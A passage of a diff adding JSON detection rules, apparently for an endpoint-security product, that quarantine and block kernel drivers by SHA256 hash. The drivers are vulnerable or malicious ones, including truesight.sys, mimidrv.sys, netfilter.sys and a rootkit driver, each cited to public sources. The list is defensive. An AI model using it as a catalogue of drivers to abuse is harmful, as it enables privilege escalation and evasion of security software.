+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459957Z",
+ "creation_date": "2026-03-23T11:45:30.459960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07fb2bb6c852f6a6fe982b2232f047e167be39738bac26806ffe0927ba873756",
+ "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ab44ddc-9a3e-569c-aca9-f2bf35d24ca3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478192Z",
+ "creation_date": "2026-03-23T11:45:30.478195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5504258361f72faa2b35b15e0fd9edbcbcc30a4d99ef68a7805898cf75d8c809",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0abbcaed-d0c2-5422-a3b5-764e3ae004bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978958Z",
+ "creation_date": "2026-03-23T11:45:29.978960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ff8fe4c220cf6416984b70a7e272006a018e5662da3cedc2a88efeb6411b4a4",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0abc5513-cce1-5994-95b2-8ef1fd4f3de5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480046Z",
+ "creation_date": "2026-03-23T11:45:30.480048Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce0a4430d090ba2f1b46abeaae0cb5fd176ac39a236888fa363bf6f9fd6036d9",
+ "comment": "Vulnerable Kernel Driver (aka iscflashx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0abdc52b-4524-5d86-b58e-61d691799b48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453941Z",
+ "creation_date": "2026-03-23T11:45:30.453952Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453961Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5b270ac8ca4f87ba51eafb3b28102875bdbdde0f15520ec0a629d8a898c0b2e",
+ "comment": "Malicious Kernel Driver (aka 4118b86e490aed091b1a219dba45f332.sys) [https://www.loldrivers.io/drivers/b32d8d7d-0dc2-4d09-a306-8efc4caf1839/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0abe08e4-bbe8-598b-b0a7-d01a839cefc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143169Z",
+ "creation_date": "2026-03-23T11:45:32.143171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f8168036d636aad1680dd0f577ef9532dbb2dad3591d63e752b0ba3ee6fd501",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0abf7a43-0d01-5c5f-a670-01e7b01178cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967232Z",
+ "creation_date": "2026-03-23T11:45:29.967236Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ace242c-c291-52c6-9218-eb4d05d0d23c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141681Z",
+ "creation_date": "2026-03-23T11:45:31.141683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141688Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13bce760077e9171b9ce3c04ecf999178cca7456cacb30ae70e2f0da2939e33c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0acf925f-7b9c-5aae-a581-8e4d8374d790",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143999Z",
+ "creation_date": "2026-03-23T11:45:32.144001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "090d409f86430e078694e621ad0bd5e458d32aa727f0eb99bda3961577df8d49",
+ "comment": "Malicious Kernel Driver (aka driver_090d409f.sys) [https://www.loldrivers.io/drivers/00561455-9da1-4f0c-8564-e4c99b716a74/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ad25de3-42e4-5165-9468-25555dfb14c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809831Z",
+ "creation_date": "2026-03-23T11:45:31.809833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d6fcd8ceb13d79b67277a41a45e0af208e8d3763c611f647e054921644627ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ada5fdd-b556-574e-894d-d4e0dc321647",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485384Z",
+ "creation_date": "2026-03-23T11:45:31.485388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41288baa8b002a997eee958b0bc3f4d1811e8b29befd4d5d694ad7e7cca62ccf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0adad9df-2fdc-5bb9-a33e-e291c3cee407",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827452Z",
+ "creation_date": "2026-03-23T11:45:30.827454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43ed5171b0881504a3d6338d3edddc3fa5b3b64362433be60168be42595f2b8c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0af681cf-ec70-55d6-b437-484ffe78d7a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473446Z",
+ "creation_date": "2026-03-23T11:45:31.473450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a163d95c4e3f7c10b60bb20ef5c8c9c875a022519e68a66a5c0fd7e80f2e0722",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0afa022e-4223-5b3b-9660-cd3a5f1f7eb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161092Z",
+ "creation_date": "2026-03-23T11:45:31.161095Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161100Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "070c0221df7c5b6ecee15d8e4a354eac6f793bf3a49be4cd7f3eb739a140926b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0afebba7-2d4f-5a81-850b-5fe7c4829b83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977764Z",
+ "creation_date": "2026-03-23T11:45:29.977766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c54ffa9a32cd99972ca905dcf99e20f8429e3cfd45bc1ddf4f9af8b3ed688c88",
+ "comment": "Vulnerable Kernel Driver (aka Lv561av.sys) [https://www.loldrivers.io/drivers/47a351ee-8abe-40d8-bc2b-557390fa0945/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b0190e6-fdc3-58cf-8c99-9d7173a082fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980935Z",
+ "creation_date": "2026-03-23T11:45:29.980937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980948Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a9b608461d55815e99700607a52fbdb7d598f968126d38e10cc4293ac4b1ad8",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b09e8b3-3288-533e-ad58-46806cdce39b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470311Z",
+ "creation_date": "2026-03-23T11:45:30.470314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09d6169da055725274a8c53c3139baff8ceef52346e5a910e735bb17f634f8bb",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b1c2827-3bb4-54db-ac4e-7ed3fb6a3c55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495836Z",
+ "creation_date": "2026-03-23T11:45:31.495838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d705fe962d99b56b8e2c9ceea176a6c78dbf609989a620a44bb3c17df8df8c0d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b1eae1c-6d25-5365-a14f-907dd470526f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968078Z",
+ "creation_date": "2026-03-23T11:45:29.968080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8abf744f0cbf09d67afc5b7cc9d613e69c73a5c8a45bcd26cf6bcfd03c3515ac",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b2286d0-418d-5bef-a6b6-3b1a4ffc4cda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809813Z",
+ "creation_date": "2026-03-23T11:45:31.809815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bcdbdcb40b10886b8357d0e92eb9c8ecc9ad35db08fc372dfdee1e743f31eff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b257322-3d83-521c-9c94-62f931995649",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143130Z",
+ "creation_date": "2026-03-23T11:45:31.143132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91163c36f5c9baa0b832df6a9ca6577b2745f482e3a3bae520cf963de493acc8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b29ef05-d328-55a3-8939-f2220f879c94",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140583Z",
+ "creation_date": "2026-03-23T11:45:31.140585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0edfecc24165a608260dd483d90d59aab016649b3f8f95131a8c8fa88e73a684",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b2ac80c-e48a-5648-9b83-4978eff47b70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
